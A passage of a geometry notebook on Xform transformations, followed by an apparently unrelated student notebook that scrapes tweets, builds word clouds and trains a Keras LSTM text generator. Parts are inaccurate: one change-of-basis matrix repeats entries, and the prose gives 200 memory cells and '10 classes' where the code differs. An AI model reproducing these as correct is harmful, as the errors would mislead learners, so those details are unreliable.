90 degrees about the origin. """ xf = Xform() xf.c11 = 0 xf.c12 = -1 xf.c21 = 1 xf.c22 = 0 seg *= xf ``` <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P17.jpg" style="width: 200px; display: inline;"> ``` """ Variable Rotation of Segments Here, a function is defined that rotates a given termination Point of a Segment a variable amount as determined by its distance to an attractor Point. For this purpose, a single Xform object is continually altered and applied to each Point. Two given Intervals, ival_dist and ival_spin, control the amount of rotation. 
""" xf = Xform() def spin(pt): # calculate an angle of rotation ang = Interval.remap(pt.dist(attr_pt),ival_dist,ival_spin) sint, cost = sin(ang), cos(ang) # set the components of the matrix to the desired rotation xf.c11, xf.c12, xf.c21, xf.c22 = cost, -sint, sint, cost return pt * xf segs = [Segment(spin(seg.spt),spin(seg.ept)) for seg in segs] """ Combining Transformations Xform objects may be combined before being applied to a geometric object. Here, four transformations are defined by calling on static methods of the Xform class, and then combined before being recursively applied to a given collection of Segments. Note that the order of combination plays a significant role in the nature of the result. """ xf_rot = Xform.rotation(angle = radians(15)) xf_trn = Xform.translation(Vec(0.50, 0.33)) xf_scl = Xform.scale(1.02) xf_mir = Xform.mirror("world_yz") xf_sum = xf_trn * xf_rot * xf_scl # figure is a given collection of Segments figs = [figure] for i in range(count): figs.append([xf_sum*seg for seg in figs[-1]]) ``` <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P18.jpg" style="width: 200px; display: inline;"> ## A Library of Spatial Transformations ### Change of Basis \begin{align} {\large M_{\vec{s_{1}},\vec{s_{2}},\vec{s_{3}} \to \vec{e_{1}},\vec{e_{2}},\vec{e_{3}}} } = \begin{bmatrix} s_{1x} & s_{2x} & s_{3x} & 0 \\ s_{1y} & s_{2y} & s_{3y} & 0 \\ s_{1z} & s_{2z} & s_{3z} & 0 \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} \begin{align} {\large M_{\vec{e_{1}},\vec{e_{2}},\vec{e_{3}} \to \vec{t_{1}},\vec{t_{2}},\vec{t_{3}} } } = \begin{bmatrix} t_{1x} & t_{1x} & t_{1x} & 0 \\ t_{2y} & t_{2y} & t_{2y} & 0 \\ t_{3z} & t_{3z} & t_{3z} & 0 \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} \begin{align} \begin{bmatrix} 1 & 0 & 0 & o_{tx} \\ 0 & 1 & 0 & o_{ty} \\ 0 & 0 & 1 & o_{tz} \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \times {\large M_{\vec{e_{1}},\vec{e_{2}},\vec{e_{3}} \to \vec{t_{1}},\vec{t_{2}},\vec{t_{3}} } } \times {\large 
M_{\vec{s_{1}},\vec{s_{2}},\vec{s_{3}} \to \vec{e_{1}},\vec{e_{2}},\vec{e_{3}}} } \times \begin{bmatrix} 1 & 0 & 0 & -o_{sx} \\ 0 & 1 & 0 & -o_{sy} \\ 0 & 0 & 1 & -o_{sz} \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P27.jpg" style="width: 200px; display: inline;">
github_jupyter
# <p style="text-align: center;"> Social Butterfly - Umbrella Academy - After Metadata </p> ![title](Images\Title_Images\Title_Image.jpg) ``` from IPython.display import HTML HTML('''<script> code_show=true; function code_toggle() { if (code_show){ $('div.input').hide(); } else { $('div.input').show(); } code_show = !code_show } $( document ).ready(code_toggle); </script> The raw code for this IPython notebook is by default hidden for easier reading. To toggle on/off the raw code, click <a href="javascript:code_toggle()">here</a>.''') ``` # <p style="text-align: center;"> Table of Contents </p> - ## 1. [Introduction](#Introduction) - ### 1.1 [Abstract](#abstract) - ### 1.2 [Importing Libraries](#importing_libraries) - ### 1.3 [Streaming](#streaming) - ### 1.3.1[Setting up Stream Listener](#stream_listener) - ### 1.3.2[Starting the Listener](#starting_the_listener) - ### 1.3.3[Making a Dataframe](#making_dataframe) - ### 1.4 [Dataset Summary](#dataset_summary) - ### 1.5 [Dataset Cleaning](#dataset_cleaning) - ### 1.5.1[Functions to clean data](#functions_for_cleaning) - ## 2. [Wordclouds](#wordclouds) - ### 2.1 [Number of words in a text](#number_of_words) - ### 2.2 [Generating Wordclouds](#Generating_Wordclouds) - ### 2.3 [Masking the wordcloud](#masking_wordcloud) - ### 2.4 [Preparing Wordclouds](#preparing_wordcloud) - ### 2.5 [Function for Building a GIF](#gif_building) - ## 3. [LSTM](#lstm) - ### 3.1 [Creating character/word mappings](#char_and_word_mapping) - ### 3.2 [Creating set of words](#creating_set_words) - ### 3.3 [Creating sequences](#creating_sequences) - ### 3.4 [Saving Tokens](#Saving_Tokens) - ### 3.5 [Integer Encoding Sequences](#Integer_Encoding) - ### 3.6 [Defining the Model](#defining_model) - ### 3.7 [Generating Sequences](#generating_sequence) - ### 3.7.1[Deeper_LSTM_Model](#DeeperModel) - ## 4. [Conclusion](#Conclusion) - ## 5. [Scope](#Scope) - ## 6. [Contribution](#Contribution) - ## 7. [Citation](#Citation) - ## 8. 
[License](#License) # <p style="text-align: center;"> 1.0 Introduction </p> <a id='Introduction'></a> # 1.1 Abstract <a id='abstract'></a> Now that we have collected the Metadata in the previous notebook (go to the [Link](./Umbrella_Academy_INFO6105_Collecting_Metadata.ipynb) if you haven't seen it yet), we can stream data from Twitter using the most frequently occurring hashtags. In this notebook we will be scraping data using the hashtags we collected in Collecting Metadata (Part 1), using a real-time streaming listener. For the data being scraped we won't be using retweets, and the conditional requirement is that the dataset should be large enough in order for us to build the model. What are we trying to build a model for? Our idea builds from the fact that creating content quickly — content that becomes popular as soon as it gets posted and adds an x-factor to one's social media handle — is quite hard, because there is so much data everywhere that one thing or another correlates with something else. Also, creating content that doesn't get popular and is not ranked well is a wasted expense. However, producing a blog post that becomes popular and ranks highly is a wise investment. Repeating the same process will give you a consistent basis for a serious competitive advantage. Most people feel that optimizing content manually is a tedious and time-consuming process. But it doesn't have to be that way. We can incorporate content optimization into the content creation workflow. In our project, we are working on a similar idea in order to create a model which optimizes content for a social platform — i.e. a "social butterfly" — by experimenting on available platforms like Twitter, Instagram, etc. We are using a series of neural networks, i.e. LSTM, for doing the same. [Back to top](#Introduction) # 1.2 Importing Libraries <a id='importing_libraries'></a> In this step, we import libraries that we need for this notebook.
A few basic libraries like numpy, pandas, matplotlib etc are used. Other libraries like tweepy, json, csv are used to collect data from twitter and save them as a json and csv file. Libraries like base [Back to top](#Introduction) ``` #Data Extraction and saving import json from json import dumps, loads from pandas.io.json import json_normalize as jn import tweepy import csv #Plotting and visualization import matplotlib.pyplot as plt #To encode and decode strings import codecs #Tweepy streaming from tweepy.streaming import StreamListener from tweepy import OAuthHandler from tweepy import Stream # diving into NLP tasks such as noun phrase extraction, sentiment analysis, classification, translation, and more. from textblob import TextBlob #time based and os dependent functionality import time import os import sys #Basic Python arrays and dataframe import numpy as np import pandas as pd #regex string commands and converting images to bas64 form import re,string import base64 from scipy.misc import imread #Library for wordcloud from wordcloud import WordCloud, STOPWORDS,ImageColorGenerator #Python gif and animation from IPython.display import HTML from matplotlib.pyplot import * from matplotlib import cm from matplotlib import animation from matplotlib import rc, animation rc('animation', html='html5') import io import imageio #LSTM libraries from keras.layers import Embedding from keras.models import Sequential from keras.layers import Dense from keras.layers import Dropout from keras.layers import LSTM from keras.utils import np_utils from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from keras.callbacks import ModelCheckpoint from keras.utils import np_utils import pickle from random import randint #Ignore warnings in outputs import warnings; warnings.simplefilter('ignore') #Twitter Credentials twitter_cred = dict() twitter_cred['CONSUMER_KEY'] = '' twitter_cred['CONSUMER_SECRET'] = '' twitter_cred['ACCESS_KEY'] = 
'' twitter_cred['ACCESS_SECRET'] = '' # Saving the Twitter Credentials to a json file script_dir = os.path.dirname('__file__') file_path = os.path.join(script_dir, 'JSON_and_CSV_Files/twitter_credentials.json') with open(file_path, 'w') as secret_info: json.dump(twitter_cred, secret_info, indent=4, sort_keys=True) with open('JSON_and_CSV_Files/twitter_credentials.json') as cred_data: info = json.load(cred_data) consumer_key = info['CONSUMER_KEY'] consumer_secret = info['CONSUMER_SECRET'] access_key = info['ACCESS_KEY'] access_secret = info['ACCESS_SECRET'] # Create the api endpoint auth = tweepy.OAuthHandler(consumer_key, consumer_secret) api = tweepy.API(auth) ``` # 1.3 Streaming <a id='streaming'></a> For collecting Metadata, we used user inputs for how many tweets should be collected and which hashtags should be scraped. However in this part, we'll use the most occuring hashtags as input and run it for a longer time (5 hours or more). [Back to top](#Introduction) # 1.3.1 Setting up Stream Listener<a id='stream_listener'></a> Here we'll set up a Stream Listener which will save the scraped tweets in a json file. We will also make sure that the tweets that we're collecting are not Retweets as there could be multiple retweets with the same content, which would make the content redundant. 
[Back to top](#streaming) ``` start_time = time.time() class MyListener(StreamListener): def __init__(self, start_time, time_limit=60): self.time = start_time self.limit = time_limit self.tweet_data = [] self.saveFile = open('JSON_and_CSV_Files/raw_tweets.json', 'a', encoding='utf-8') def on_data(self, data): if (time.time() - self.time) < self.limit: decoded = json.loads(data) if not decoded['text'].startswith('RT'): try: self.tweet_data.append(data) saveFile = open('JSON_and_CSV_Files/raw_tweets.json', 'w', encoding='utf-8') saveFile.write(u'[\n') saveFile.write(','.join(self.tweet_data)) saveFile.write(u'\n]') saveFile.close() #exit() return True except BaseException as e: print("Error on_data: %s" % str(e)) time.sleep(5) return True else: self.saveFile.close() return False def on_error(self, status): print(status) return True #if __name__ == '__main__': #MyListener = MyListener() #auth = OAuthHandler(consumer_key, consumer_secret) #auth.set_access_token(access_key, access_secret) #stream = Stream(auth,MyListener ) #stream.filter(track=['#ML', '#Datascience', '#Arima']) ``` # 1.3.2 Starting the Listener<a id='starting_the_listener'></a> In this step we start the stream listener for the given timeframe. We also filter our stream such that it only collects data on the given hashtags. We also restrict the language to english so as to not deal with non-ascii characters. [Back to top](#streaming) ``` #MyListener = MyListener() #auth = OAuthHandler(consumer_key, consumer_secret) #auth.set_access_token(access_key, access_secret) #stream = Stream(auth,MyListener(start_time, time_limit=18000) ) #stream.filter(track=['#ML', '#AI', '#deeplearning'],languages =["en"]) ``` # 1.3.3 Making a Dataframe<a id='making_dataframe'></a> In this step we will normalize the json file that we have, since it is in nested form(JSON Object inside a JSON Object). After this we save the file to a dataframe, since it is easier to work with a Pandas' Dataframe. 
[Back to top](#streaming) ``` # data=open('raw_tweets.json', 'r', encoding='utf-8') # df = pandas.io.json.json_normalize(data) # df.columns = df.columns.map(lambda x: x.split(".")[-1]) # df.head() with open('JSON_and_CSV_Files/raw_tweets.json', 'r', encoding="utf-8") as json_file: json_work = json.load(json_file) df = pd.io.json.json_normalize(json_work) ``` Since we'll be working with only the text values in our algorithm, we don't need any other extracted columns. So we select only the column 'text'. ``` #Setting our source for text generation df_clean=df['text'] #Making the dataframe df_cleans=pd.DataFrame({'text':df_clean}) ``` # 1.4 Dataset Summary <a id='dataset_summary'></a> Since this dataset is scraped from twitter, it is bound to have some irregular values. In this step we check the summary of the dataset by checking the first 5 columns of the scraped data, checking the data types of the columns and checking the summary of the dataset. [Back to top](#Introduction) ``` df_cleans.head() df_cleans.info() df_cleans.describe() ``` # 1.5 Dataset Cleaning <a id='dataset_cleaning'></a> Since this dataset is scraped from twitter, it is bound to have some irregular values. By seeing the summary of our dataset we have gained some important insight about the type of data, and we need to clean the data to be able to further process it. [Back to top](#Introduction) ### 1.5.1 Functions to clean data <a id='functions_for_cleaning'></a> We have created a wide array of functions to clean the data by removing hashtags and other entities in the text ('@', 'â'..). Then we have removed all non-ascii characters from the text and also removed all Emojis. 
Along with this we are also extracting hashtags from the tweets and saving them in a seperate column [Back to top](#dataset_cleaning) ``` def remove_RT(x): if x=="RT ": return " " #return str(x.replace('b\'RT ','')) def strip_links(text): link_regex = re.compile('((https?):((//)|(\\\\))+([\w\d:#@%/;$()~_?\+-=\\\.&](#!)?)*)', re.DOTALL) links = re.findall(link_regex, text) #cleanString = re.sub('\W+','', string ) for link in links: text = text.replace(link[0], ', ') #text = text.replace(cleanString, '') return text def strip_all_entities(text): entity_prefixes = ['@','#'] for separator in string.punctuation: if separator not in entity_prefixes : text = text.replace(separator,' ') words = [] for word in text.split(): word = word.strip() if word: if word[0] not in entity_prefixes: words.append(word) return ' '.join(words) def removeNonAscii(s): return "".join(i for i in s if ord(i)<128) df_cleans['TextNoMentions']=df_cleans['text'].str.replace('RT', ' ') df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].str.replace('#', '', case=False) #df_cleans['TextNoLinks']=df_cleans['text'].apply(strip_links) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].str.replace('http\S+|www.\S+', '', case=False) #df_cleans['TextNoEntities']=df_cleans['TextNoLinks'].apply(strip_all_entities) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].apply(strip_all_entities) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].apply(removeNonAscii) a=df_cleans['TextNoMentions'].unique() a=a.tolist() df_cleaner=pd.DataFrame({'text':a}) df_cleaner.head() df_cleaner['text']=df_cleaner['text'].str.lower() ``` # <p style="text-align: center;"> 2.0 Wordclouds </p> <a id='wordclouds'></a> [Back to top](#Introduction) # 2.1 Number of words in a text <a id='number_of_words'></a> [Back to top](#wordclouds) ``` # Lets check the avg number of words in text written by each author in a histogram def word_count(row): """function to calculate the count of words in a given text """ text = 
row['text'] text_splited = text.split(' ') word_count = text_splited.__len__() return word_count df_cleaner['word_count'] = '' df_cleaner['word_count'] = df_cleaner.apply(lambda row: word_count(row), axis =1) df_cleaner.head() ``` # 2.2 Generating Wordclouds <a id='Generating_Wordclouds'></a> [Back to top](#wordclouds) ``` #mws = df_cleaner["text"].values wc = WordCloud(background_color="white", max_words=5000, stopwords=STOPWORDS, max_font_size= 50) # generate word cloud wc.generate(" ".join(df_cleaner.text.values)) # show plt.figure(figsize=(16,13)) plt.imshow(wc, interpolation='bilinear') plt.title("words from all author", fontsize=14,color='seagreen') plt.axis("off") ``` # 2.3 Masking the wordcloud <a id='masking_wordcloud'></a> [Back to top](#wordclouds) ``` def base_64(input_image): """ Function to convert the image to base64 """ image = open(input_image, 'rb') #open binary file in read mode image_read = image.read() output_base64 = base64.encodebytes(image_read) return output_base64 def codecs_img(input_image,base64_image): """Generate the Mask for EAP """ f1 = open(input_image, "wb") f1.write(codecs.decode(base64_image,'base64')) f1.close() img1 = imageio.imread(input_image) #img = img1.resize((980,1000)) #imgplot=plt.imshow(img1) #plt.show() hcmask=img1 return hcmask mask = base_64('Images/Wordcloud/mask.png') img1 = base_64('Images/Wordcloud/1.png') img2 = base_64('Images/Wordcloud/2.png') img3 = base_64('Images/Wordcloud/3.png') img4 = base_64('Images/Wordcloud/4.png') hcmask1 = codecs_img('Images/Wordcloud/mask.png' , mask) hcmask2 = codecs_img('Images/Wordcloud/1.png' , img1) hcmask3 = codecs_img('Images/Wordcloud/2.png' , img2) hcmask4 = codecs_img('Images/Wordcloud/3.png' , img3) hcmask5 = codecs_img('Images/Wordcloud/4.png' , img4) ``` Updating the stopwords because data from twitter has a few terms which appear over and over again, which have no relevance to our text like 'gt' which is an acronym for go to, it is added before a link, so along with 
removing links, we must also remove these words ``` Stopwords_Updated = ('amp', 'gt', 'via' ,'de', 'https') STOPWORDS=STOPWORDS.union(Stopwords_Updated) mask = df_cleaner['text'].values def generate_wordcloud(words, mask): """ Generating Word Clouds """ word_cloud = WordCloud(width = 512, height = 512, background_color='white', stopwords=STOPWORDS, mask=mask, max_font_size= 45).generate(" ".join(words)) plt.figure(figsize=(10,8)) image_colors = ImageColorGenerator(mask) plt.imshow(word_cloud, interpolation='bilinear') # interpolation(helps in masking) plt.axis('off') plt.tight_layout(pad=0) plt.show() generate_wordcloud(mask,hcmask1) ``` # 2.4 Preparing Wordclouds <a id='preparing_wordcloud'></a> [Back to top](#wordclouds) ``` def generate_wordclouds_gif(words, mask, wc_list): """ Generating Word Clouds """ word_cloud = WordCloud(width = 512, height = 512, background_color='white', stopwords=STOPWORDS, mask=mask, max_font_size= 45).generate(" ".join(words)) wc_list.append(word_cloud) return wc_list %%capture wc_list=[] generate_wordclouds_gif(mask, hcmask2, wc_list) generate_wordclouds_gif(mask, hcmask3, wc_list) generate_wordclouds_gif(mask, hcmask4, wc_list) generate_wordclouds_gif(mask, hcmask5, wc_list) generate_wordclouds_gif(mask, hcmask5, wc_list) generate_wordclouds_gif(mask, hcmask4, wc_list) generate_wordclouds_gif(mask, hcmask3, wc_list) generate_wordclouds_gif(mask, hcmask2, wc_list) ``` # 2.5 Function for Building a GIF <a id='gif_building'></a> [Back to top](#wordclouds) ``` start = time.time() def build_gif(imgs = wc_list, show_gif=False, save_gif=True, title=''): """function to create a gif of heatmaps""" fig, ax = plt.subplots(nrows=1,ncols=1,figsize=(21,15)) ax.set_axis_off() author_range = ["A", "B", "C", "D", "E", "F", "G", "H"] def show_im(pairs): ax.clear() ax.set_title(str((pairs[0]))) ax.imshow(pairs[1]) ax.set_axis_off() pairs = list(zip(author_range, imgs)) im_ani = matplotlib.animation.FuncAnimation(fig, show_im, pairs,interval=450, 
repeat_delay=0, blit=False, repeat=True) plt.cla() from IPython.display import HTML HTML(im_ani.to_html5_video()) if save_gif: im_ani.save('Images/GIFs/animation1.gif', writer='pillow') #, writer='imagemagick' if show_gif: plt.show() return end = time.time() print("Time taken by above cell is {}".format(end-start)) %%capture start = time.time() build_gif() end = time.time() print(end-start) filename = 'Images/GIFs/animation1.gif' video = io.open(filename, 'r+b').read() encoded = base64.b64encode(video) HTML(data='''<img src="data:image/gif;base64,{0}" type="gif" />'''.format(encoded.decode('ascii'))) ``` # <p style="text-align: center;"> 3.0 LSTM</p> <a id='lstm'></a> [Back to top](#Introduction) A language model can predict the probability of the next word in the sequence, based on the words already observed in the sequence. **Neural network models** are a preferred method for developing statistical language models because they can use a distributed representation where different words with similar meanings have similar representation and because they can use a large context of recently observed words when making predictions. In this section, we will develop a simple LSTM network to learn sequences of characters from the tweets we scrapped. In the next section we will use this model to generate new sequences of words. But Before that lets look at how LSTM works. A **recurrent neural network** (RNN) is a class of artificial neural network where connections between nodes form a directed graph along a temporal sequence. This allows it to exhibit temporal dynamic behavior. Unlike feedforward neural networks, RNNs can use their internal state (memory) to process sequences of inputs. This makes them applicable to tasks such as unsegmented, connected handwriting recognition or speech recognition.One of the appeals of RNNs is the idea that they might be able to connect previous information to the present task. 
Sometimes we only want to look at the current information (recent) to perform present task and past information is of not much use to our result, but in case of language modeling , where context is important at times and not important at other times the situation becomes trickier. In cases , where the gap between relevant information and the place where it's needed is small, RNN are useful because they can learn to use past information. But there are also cases where we need more context, the gap becomes large between two informations, RNNs is unable to learn to connect the information. **And that's when LSTM comes in play** ![rnn](Images\LSTM\RNN.png) **Long Short Term Memory** networks – usually just called “LSTMs” – are a special kind of RNN, capable of learning long-term dependencies. LSTMs are explicitly designed to avoid the long-term dependency problem. Remembering information for long periods of time is practically their default behavior ### All recurrent neural networks have the form of a chain of repeating modules of neural network. In standard RNNs, this repeating module will have a very simple structure, such as a single tanh layer.*** ![simplernn](Images\LSTM\SimpleRnn.png) ### LSTMs also have this chain like structure, but the repeating module has a different structure. Instead of having a single neural network layer, there are four, interacting in a very special way.*** ![Lstm](Images\LSTM\Lstm.png) ### How LSTM Works? **Lets first look at the notations used in the chain like structure(it's not that complex)** ![notation](Images\LSTM\notation.png) In the above diagram, each line carries an entire vector, from the output of one node to the inputs of others. > **Pink circles** represent pointwise operations, like vector addition > **Yellow boxes** are learned neural network layers. 
> **Lines** merging denote concatenation > **Line** forking denote its content being copied and > The **copies** going to different locations LSTM is a chain like structure containing various cells , each represented by green box in above diagram. The most important thing in LSTMs is the cell state i.e the horizontal line running through the top of the diagram. The cell state is kind of like a conveyor belt. It runs straight down the entire chain, with only some minor linear interactions. It’s very easy for information to just flow along it unchanged. ![LSTM-1](Images\LSTM\LSTM3-C.png) The LSTM does has the ability to remove or add information to the cell state, carefully regulated by structures called gates. Gates are a way to optionally let information through. They are composed out of a sigmoid neural net layer and a pointwise multiplication operation. The sigmoid layer outputs numbers between zero and one, describing how much of each component should be let through. A value of zero means “let nothing through,” while a value of one means “let everything through!” ![LSTM-2](Images\LSTM\LSTM3-gate.png) An LSTM has three of these gates, to protect and control the cell state. #### Step by Step LSTM 1. The first step in LSTM is to decide what information we are going to discard from the cell state. This decison is made by sigmoid layer. It looks at ***ht-1 and xt***, and outputs a number between 0 and 1 for each number in the cell state ***Ct−1***. > 1 represents “keep this” while a 0 represents “get rid of this.” ![LSTM-3](Images\LSTM\LSTM3-f.png) 2. The next step is to decide what new information we’re going to store in the cell state. This has two parts. >First, a sigmoid layer called the “input gate layer” decides which values we’ll update and which we will reject. >Next, a tanh layer creates a vector of new values, **C̃t**, that could be added to the new state. 
![LSTM-4](Images\LSTM\LSTM3-I.png) **Next step, combine these two to create an update to the state.** 3. Then we update the old cell state, **Ct−1**, into the new cell state **Ct**. We multiply the old state by **ft**, forgetting the things we decided to forget earlier. Then we add **it∗C̃t** . This is the new values, scaled by how much we decided to update each state value. ![LSTM-5](Images\LSTM\LSTM3-C.png) 4. Finally, we need to decide what we’re going to output. This output will be based on our cell state, but will be a filtered version. First, we run a sigmoid layer which decides what parts of the cell state we’re going to output. Then, we put the cell state through tanh (to push the values to be between −1 and 1) and multiply it by the output of the sigmoid gate, so that we only output the parts we decided to. ![LSTM-6](Images\LSTM\LSTMo.png) ## Lets work it out!! Lets try making a model based on LSTM ![Lets_Start](Images\GIFs\Lets_Start.gif) The language model will be statistical and will predict the probability of each word given an input sequence of text. The predicted word will be fed in as input to in turn generate the next word. A key design decision is how long the input sequences should be. They need to be long enough to allow the model to learn the context for the words to predict. This input length will also define the length of seed text used to generate new sequences when we use the model. # 3.1 Creating character/word mappings <a id='char_and_word_mapping'></a> [Back to top](#lstm) We need to transform the raw text into a sequence of tokens or words that we can use as a source to train the model. We will be removing following from our given input texts > 1. Replace ‘–‘ with a white space so we can split words better. > 2. Split words based on white space. > 3. Remove all punctuation from words to reduce the vocabulary size (e.g. ‘What?’ becomes ‘What’). > 4. Remove all words that are not alphabetic to remove standalone punctuation tokens. > 5. 
# turn a doc into clean tokens
def clean_doc(row):
    """Tokenize the 'text' field of a dataframe row into clean, lower-case words.

    '--' is treated as a word separator, punctuation is stripped from each
    token, and purely non-alphabetic tokens (numbers, leftover symbols)
    are dropped.
    """
    # '--' joins words in the raw text, so turn it into a separator first
    raw_tokens = row['text'].replace('--', ' ').split()
    # strip every punctuation character from each token
    strip_punct = str.maketrans('', '', string.punctuation)
    stripped = [token.translate(strip_punct) for token in raw_tokens]
    # keep only alphabetic tokens, normalized to lower case
    return [token.lower() for token in stripped if token.isalpha()]


# creating a set of all words in the text columns
def list_creation(list_trial):
    """Flatten a pandas Series of token lists into a set of unique tokens."""
    unique_tokens = set()
    for token_list in list_trial.tolist():
        unique_tokens.update(token_list)
    return unique_tokens
# save tokens to file, one dialog per line
def save_doc(lines, filename):
    """Write a list of strings to `filename`, one entry per line.

    Uses a context manager so the file is closed even if the write raises,
    and an explicit UTF-8 encoding so the output does not depend on the
    platform's default encoding.
    """
    data = '\n'.join(lines)
    with open(filename, 'w', encoding='utf-8') as file:
        file.write(data)


# loads tokens from file, one dialog per line
def load_doc(filename):
    """Read the whole contents of `filename` and return it as one string."""
    # open the file as read only; the context manager guarantees closing
    with open(filename, 'r', encoding='utf-8') as file:
        return file.read()
Later, when we make predictions, we can convert the prediction to numbers and look up their associated words in the same mapping. To do this encoding, we will use the Tokenizer class in the Keras API. >1. First, the Tokenizer must be trained on the entire training dataset, which means it finds all of the unique words in the data and assigns each a unique integer. >2. We can then use the fit Tokenizer to encode all of the training sequences, converting each sequence from a list of words to a list of integers. ``` # integer encode sequences of words tokenizer = Tokenizer() tokenizer.fit_on_texts(lines) sequences = tokenizer.texts_to_sequences(lines) ``` ## Word Index We can access the mapping of words to integers as a dictionary attribute called word_index on the Tokenizer object. We need to know the size of the vocabulary for defining the embedding layer later. We can determine the vocabulary by calculating the size of the mapping dictionary. Words are assigned values from 1 to the total number of words .The Embedding layer needs to allocate a vector representation for each word in this vocabulary from index 1 to the largest index and because indexing of arrays is zero-offset, the index of the word at the end of the vocabulary will be n, that means the array must be n+1 in length. when specifying the vocabulary size to the Embedding layer, we specify it as 1 larger than the actual vocabulary. ``` # vocabulary size vocab_size = len(tokenizer.word_index) + 1 ``` ### Input and Output Sequences Now encoding of sequence is done, so we need to know the input (X) and output (y) elememts. We do that by array slicing. We have used one hot encoding for output word, converting it from an integer to a vector of 0 values, 1 for each word in vocabulary,indicating 1 to specific word at the index of words . 
We have done this , so that the model learns to predict the probability distribution for the next word and the ground truth from which to learn from is 0 for all words except the actual word that comes next. Keras provides the to_categorical() that can be used to one hot encode the output words for each input-output sequence pair. ***Finally, we need to specify to the Embedding layer how long input sequences are. A good generic way to specify that is to use the second dimension (number of columns) of the input data’s shape. That way, if you change the length of sequences when preparing data, you do not need to change this data loading code; it is generic.*** ``` sequences = np.asarray(sequences) X, y = sequences[:,:-1], sequences[:,-1] seq_length = X.shape[1] y = np_utils.to_categorical(y, num_classes=vocab_size) ``` # 3.6 Defining the Model <a id='defining_model'></a> [Back to top](#lstm) We will be fitting and training our model now. The learned embedding needs to know the size of the vocabulary and the length of input sequences as previously discussed. It also has a parameter to specify how many dimensions will be used to represent each word. That is, the size of the embedding vector space. We will use a two LSTM hidden layers with 200 memory cells each. More memory cells and a deeper network may achieve better results. ``` # define model model = Sequential() model.add(Embedding(vocab_size, 75, input_length=seq_length)) model.add(LSTM(100, return_sequences=True)) model.add(LSTM(100)) model.add(Dense(100, activation='relu')) model.add(Dense(vocab_size, activation='softmax')) print(model.summary()) ``` #### Important Points to Note:- >A dense fully connected layer with 200 neurons connects to the LSTM hidden layers to interpret the features extracted from the sequence. The output layer predicts the next word as a single vector the size of the vocabulary with a probability for each word in the vocabulary. 
A softmax activation function is used to ensure the outputs have the characteristics of normalized probabilities. >Our model is learning a multi-class classification and this is the suitable loss function for this type of problem. The efficient Adam implementation to mini-batch gradient descent is used and accuracy is evaluated of the model. >Finally, the model is fit on the data for 100 training epochs with a modest batch size of 128 to speed things up. #### Model Parameters:- >Activation Function: We have used ReLU as the activation function. ReLU is a non-linear activation function, which helps complex relationships in the data to be captured by the model. >Optimiser: We use adam optimiser, which is an adaptive learning rate optimiser. >Loss function: We will train a network to output a probability over the 10 classes using Cross-Entropy loss, also called Softmax Loss. It is very useful for multi-class classification. ``` %%capture # compile model model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) # fit model MODEL=model.fit(X, y, batch_size=128, epochs=100) ``` #### We use the Keras model API to save the model to the file ‘model.h5‘ in the current working directory. Our model is all trained now and can be utilised to generate new sequences of texts that have same statistical properties, although it might be difficult but then nothing is impossible. We need the text so that we can choose a source sequence as input to the model for generating a new sequence of text. The model will require 100 words as input. We will need to specify the expected length of input. We can determine this from the input sequences by calculating the length of one line of the loaded data and subtracting 1 for the expected output word that is also on the same line. 
``` # save the model to file model.save('LSTM_Files/model.h5') # save the tokenizer output = open('LSTM_Files/myfile.pkl', 'wb') pickle.dump(tokenizer, output) output.close() #pkl_file = open('tokenizer.pkl', 'rb') #mydict2 = pickle.load(pkl_file) #pkl_file.close() seq_length = len(lines[0].split()) - 1 ####sequence lenght that we will feed ``` ![almost_there](Images\GIFs\almost_there.gif) # 3.6 Generating Sequences <a id='generating_sequence'></a> Preparing a seed input, which is randomly done ``` seed_text = lines[randint(0,len(lines))] print(seed_text + '\n') ``` Basis to understand the following present given underneath >1. First, the seed text must be encoded to integers using the same tokenizer that we used when training the model. >Following line in code shows us this encoded = tokenizer.texts_to_sequences([in_text])[0] >2. The model can predict the next word directly by calling model.predict_classes() that will return the index of the word with the highest probability. (represented by yhat). Look up the index in the Tokenizers mapping to get the associated word. >3. Then we will be appending this word to the seed text and repeat the process. >4. The input sequence is going to get too long. We can truncate it to the desired length after the input sequence has been encoded to integers. Keras provides the pad_sequences() function that we can use to perform this truncation. 
def generate_seq(model, tokenizer, seq_length, seed_text, n_words):
    """Generate a sequence of words from a trained word-level language model.

    Parameters
    ----------
    model : trained Keras model mapping an integer-encoded word sequence to
        a probability distribution over the vocabulary.
    tokenizer : fitted Keras Tokenizer used to train the model; supplies the
        word <-> index mapping.
    seq_length : int
        Number of input words the model expects.
    seed_text : str
        Initial text used to prime the generation.
    n_words : int
        Number of new words to generate.

    Returns
    -------
    str
        The generated words joined by single spaces (seed text excluded).
    """
    # Invert word -> index once, instead of scanning tokenizer.word_index
    # on every generated word (O(vocab) per step in the original).
    index_to_word = {index: word for word, index in tokenizer.word_index.items()}
    result = list()
    in_text = seed_text
    # generate a fixed number of words
    for _ in range(n_words):
        # encode the running text as integers with the training tokenizer
        encoded = tokenizer.texts_to_sequences([in_text])[0]
        # truncate sequences to the fixed length the model was trained on
        encoded = pad_sequences([encoded], maxlen=seq_length, truncating='pre')
        # model.predict_classes() was removed from Keras (TF 2.6+); take the
        # argmax of the predicted probability distribution instead.
        probs = model.predict(encoded, verbose=0)
        yhat = int(np.argmax(probs, axis=-1)[0])
        # map the predicted word index back to its word ('' if unknown)
        out_word = index_to_word.get(yhat, '')
        # append to the input so the next step conditions on this word
        in_text += ' ' + out_word
        result.append(out_word)
    return ' '.join(result)
